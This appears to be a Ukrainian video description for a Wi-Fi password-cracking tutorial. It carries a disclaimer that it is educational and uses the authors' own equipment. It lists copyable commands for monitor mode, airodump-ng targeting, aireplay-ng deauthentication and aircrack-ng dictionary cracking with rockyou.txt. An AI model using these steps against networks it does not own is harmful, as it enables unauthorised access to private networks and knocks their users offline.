Увага! Дане відео несе виключно навчальний характер, все мережеве обладнання використане в відео належить нам, не намагайтесь використати навички, отримані в даному відео для отримання доступу до чужих мереж. Ідеєю даного відео є показати вразливості wifi мереж а також важливість складних паролів.
Disclaimer: This video is for educational purposes only, all equipment used in this video is our own, do not try to use skills acquired from this video to get access to unauthorised networks.

Таймкоди

0:00 – Вступ
00:44 – Спосіб перший (Fern wifi cracker)
00:3:28 – Спосіб другий (Wifite)
00:4:53 – Спосіб третій (aircrack-ng)
00:9:11 – Перевірка валідності отриманого паролю

Використані команди:

—— Спосіб №2 (wifite) ——
Перевірити підключені девайси щоб обрати необхідний модуль:
– iwconfig

Перевести модуль в режим моніторингу:
– sudo airmon-ng start wlan1

Перевірити чи вдалось запустити режим моніторингу (модуль тепер повинен містити приставку mon):
– iwconfig

Запустити wifite:
– sudo wifite

І далі слідуємо командам, спершу вибираємо модуль, який переведений в монітормод, а далі і вайфай який нас цікавить. Вибір за допомогою цифр на клавіатурі

—— Спосіб №3 ——

Перевірити наявні девайси:
– iwconfig

Перевести модуль в режим моніторингу
не забудьте вказати назву свого модуля (замість wlan1):
– sudo airmon-ng start wlan1

Перевірити чи вдалось запустити режим моніторингу (модуль тепер повинен містити приставку mon):
– iwconfig

Робимо пошук наявних wifi мереж:
– sudo airodump-ng wlan1mon
ctrl+c щоб зупинити пошук
Тут запам’ятовуємо мак-адресу (BSSID) і канал (CH)

Перевірити тільки вибрану мережу на підключені девайси (обво’язково має бути принаймні 1 девайс підключений), не забудьте вставити свою мак адерсу яку отримали з команди вище:
– sudo airodump-ng wlan1mon -d 68:FF:7B:C4:8E:A2
ctrl+c щоб зупинити пошук

Початок процедури хаку

В 1-ому вікні починаємо процедуру запису всіх даних роутера
Не забудьте вставити свій канал (після -c) і свою мак адресу (після bssid), також можете змінити назву файлу (hack1):
– sudo airodump-ng -w hack1 -c 10 –bssid 68:FF:7B:C4:8E:A2 wlan1mon
В 2-ому вікні процедура деавтентифікації з віфі:
– sudo aireplay-ng –deauth 0 -a 68:FF:7B:C4:8E:A2 wlan1mon

Коли в першому вікні появиться Handshake можна перервати обидва вікна
ctrl+c щоб перервати

Перевірити чи зберігся файл
– Ls

Зупинити режим моніторингу
Airmon-ng stop wlan1mon
Або
service NetworkManager start

Підбір паролю з Hack1 на основі rockyou.txt
Не забудьте вказати свою назву файлу і де він знаходиться:
– aircrack-ng hack1-01.cap -w /home/kali/Downloads/rockyou.txt

rockyou.txt можна скачати з гітхабу (перше посилання в гуглі якщо ввести rockyou.txt)